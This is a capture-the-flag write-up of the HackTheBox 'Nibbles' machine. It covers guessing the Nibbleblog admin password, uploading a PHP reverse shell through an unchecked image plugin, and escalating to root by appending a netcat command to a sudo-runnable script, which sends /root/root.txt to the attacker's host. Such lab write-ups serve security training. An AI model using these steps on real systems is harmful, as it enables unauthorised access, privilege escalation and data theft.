Press "Enter" to skip to content

[HackTheBox] Nibbles

I started off with a quick Nmap scan on the target machine.

nmap -sS -sV -Pn 10.10.10.75

Starting Nmap 7.70 ( https://nmap.org ) at 2018-03-24 00:46 AEST
Nmap scan report for 10.10.10.75
Host is up (0.23s latency).
Not shown: 998 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Fairly standard ports open simple ports and because there was an HTTP port open, I decided to see if there was anything meaningful.

Nope, nothing interesting here but when you look into the source we can see something interesting!

Browsing to this directory we stumble across a blog but there is nothing interesting that we can leverage.

This meant more enumeration had to be done. After a little bit of googling, I came across their Github repository located at:

https://github.com/dignajar/nibbleblog

If you look at the repository we can see a few files of interest:

admin.php
install.php
update.php

There wasn’t anything too interesting inside of install.php and update.php other than just a version number for the hosted web application.

Nibbleblog 4.0.3 "Coffee" ©2009 - 2014 | Developed by Diego Najar

However, admin.php looked like a potential path we can dive into.

I had a quick check on Google to see if there were any exploits available that would allow us to bypass the login page and returned with no results so it meant that I would (most likely) have to bruteforce the login.

Several trial & errors after, I found the credentials which were:

Username: admin
Password: nibbles

Inside of the admin panel I couldn’t see anything that I could leverage so I began to enumerate more. I found this link which explains how to exploit a vulnerability to achieve code execution. In short, the image plugin does not check the extensions of uploaded files meaning we could upload a php file and gain code execution.

I found a generic reverse-shell.php (from here) which I modified it with my IP and Port.

With the payload ready to go, all I had to do is get a netcat session running on my VM.

nc -nvlp 8989

With everything locked and loaded, I uploaded my payload via the plugin.

You can see warnings but we can ignore it. The plugin uploads images to this location:

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

and by navigating to this location, it would trigger the reverse shell back to my VM.

listening on [any] 8989 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.75] 54270

Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 10:59:13 up 11:55,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off

$ whoami
nibbler

With a shell ready to go, all I had to do was navigate to the nibbler user folder and retrieve the user.txt flag.

$ cd /home/nibbler && dir
personal.zip	user.txt

$ cat user.txt
b0----------------------------d8

With the user flag out of the way, I decided to enumerate the machine a little bit more.
On a Linux machine, I always start off with the following command:

sudo -l

This command showed us a few interesting things:

$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

As you can see, our user can run the file monitor.sh as root. This means that if we can modify this script, we could potentially elevate to root privileges.

If you recall from the previous “dir” command, we had a file called personal.zip. Luckily, the file was not password protected and I was able to unzip the file.

$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  

I navigated to the directory with the bash script file and observed the privileges on it.

$ pwd
/home/nibbler/personal/stuff

$ ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh

We have read/write access to this script file.
From here, all I had to do was append my command to this script and it would be run as root.

I quickly navigated to the /bin folder to check for anything I could leverage to get the root flag.

chvt		    nc		      tailf
cp		    nc.openbsd	      tar

I saw that netcat was installed on the computer so I quickly tried to see if this was the version with the -e parameter.

nc -e

nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.

This wasn’t too much of a worry because I could just use the traditional netcat to transfer the file onto my VM.

I started a connection on my VM, listening to a file transfer:

nc -l -p 9000 > root.txt

Then I appended my command to the bottom of the monitor script.

echo "nc -w 3 10.10.14.10 9000 < /root/root.txt" >> monitor.sh

All that was left was to run the monitor script.

$ sudo /home/nibbler/personal/stuff/monitor.sh

On my local machine, I can see that my netcat connection has closed which meant that it successfully received the file.

All I had to do was observe the file on my VM and the machine would be conquered!

root@kali:~/Desktop/HackTheBox/Nibbles# cat root.txt
b6----------------------------8c

Overall, the machine was fairly simple but fun. It definitely touched on alot of the basics which is always good to keep in check!

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *